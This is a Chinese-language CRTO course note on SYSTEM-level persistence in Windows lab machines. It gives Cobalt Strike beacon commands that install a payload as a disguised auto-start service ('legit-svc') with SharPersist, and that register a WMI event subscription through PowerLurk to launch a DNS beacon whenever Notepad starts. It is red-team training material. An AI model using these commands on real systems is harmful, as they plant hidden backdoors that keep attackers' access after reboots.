CRTO | 主机持久化-已更新-工具盒子

本章主要介绍获得SYSTEM权限后的持久化技术，主要是Windows服务和WMI事件订阅

1-概述

在之前章节"主机持久化"中，主要说明如何在用户环境中获取持久化。但是，在提升主机上的权限后，我们还可以添加持久性机制来维护 SYSTEM 访问权限。这样就可以保持对计算机的提升访问权限，而无需再次利用漏洞（因为漏洞可能会在以后被修补或修复），条件是必须在高完整性的 Beacon 中操作

注意：实验环境中有代理设置，SYSTEM 进程无法向 Web 代理进行身份验证，因此不能使用 HTTP Beacons，需要改用 P2P 或 DNS Beacons

2-Windows服务

正如我们在之前章节看到的，有许多 Windows 服务以 SYSTEM 身份运行。我们利用服务进行权限提升的各种手段也可以起到持久化的作用，但代价是破坏合法服务。相反，我们可以创建自己的服务，而不会影响现有的服务

    beacon> cd C:\Windowsbeacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe legit-svc.exe

beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add

[*] INFO: Adding service persistence
[*] INFO: Command: C:\Windows\legit-svc.exe
[*] INFO: Command Args: 
[*] INFO: Service Name: legit-svc

[+] SUCCESS: Service persistence added

这将创建一个处于 STOPPED 状态的新服务，但 START_TYPE 设置为 AUTO_START。这意味着服务在计算机重新启动之前不会运行。当计算机启动时，服务也会启动，并且它将等待连接

3-WMI 事件订阅

通过利用以下三种方式，可以实现 WMI 事件实现的持久化：

EventConsumer（事件消费者）
EventFilter（事件过滤器）
FilterToConsumerBinding（过滤器到消费者绑定）

EventConsumer 是想要执行的操作，也就是执行有效负载，可以通过 OS 命令（例如 PowerShell一句话）或 VBScript 来实现

EventFilter 是可以采取行动的触发器，任何任意 WMI 查询都可以用作过滤器，它提供几乎无限的选项。这些选项可以包括特定进程启动时、用户登录时、插入 USB 设备时、一天中的任何特定时间或时间间隔

FilterToConsumerBinding 是将 EventConsumer 和 EventFilter 链接在一起

‍

PowerLurk（https://github.com/Sw4mpf0x/PowerLurk）是一个用于构建这些 WMI 事件的 PowerShell 工具

首先将 DNS 有效负载上传到 Windows 目录，导入 PowerLurk.ps1 并创建一个新的 WMI 事件订阅，该订阅将在启动记事本时执行。

    beacon> cd C:\Windowsbeacon> upload C:\Payloads\dns_x64.exe
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

之后可以使用Get-WmiEvent -Name WmiBackdoor查看这些订阅

EventConsumer的CommandLineTemplate为C:\Windows\dns_x64.exe

EventFilter 的查询语句是SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'

在Workstation 2上打开记事本，DNS Beacon 将会上线